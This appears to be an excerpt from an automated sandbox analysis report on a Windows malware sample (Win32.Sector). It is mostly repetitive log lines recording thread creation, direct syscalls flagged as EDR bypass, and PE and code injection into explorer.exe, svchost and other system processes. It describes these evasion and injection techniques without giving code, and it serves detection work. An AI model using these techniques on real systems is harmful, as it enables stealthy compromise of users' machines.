        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1260000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: BD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 1280000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 12D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeThread created: unknown EIP: 900000Jump to behavior
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtClose: Direct from: 0x77542B6C
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtSetInformationProcess: Direct from: 0x77542C5C
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtQueryInformationProcess: Direct from: 0x77542C26
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtDelayExecution: Direct from: 0x77542DDC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtAllocateVirtualMemory: Direct from: 0x77542BFC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtResumeThread: Direct from: 0x775436AC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtCreateMutant: Direct from: 0x775435CC
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtSetInformationThread: Direct from: 0x775363F9
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exeNtMapViewOfSection: Direct from: 0x77542D1C
        Injects a PE file into a foreign processes
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe base: 400000 value starts with: 4D5AJump to behavior
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: PID: 3504 base: B60000 value: E8Jump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F10000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeMemory written: C:\Windows\System32\dwm.exe base: 660000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\dwm.exe base: 670000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\sihost.exe base: D20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\svchost.exe base: 3F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\svchost.exe base: 8D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\ctfmon.exe base: 7F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\explorer.exe base: B60000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\svchost.exe base: 2E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 620000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A80000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\smartscreen.exe base: 890000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: F70000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\svchost.exe base: 210000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Windows\System32\conhost.exe base: 90000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A30000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B90000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 4F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1040000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1050000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1350000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1360000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 600000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 610000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 190000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 5B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: E10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 830000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1140000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1150000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 560000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 570000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 13F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1400000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EF0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: F10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1110000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1120000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: D10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 3C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 930000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 940000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A40000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A50000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 9F0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A00000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 780000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B10000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 820000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1550000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 15A0000Jump to behavior
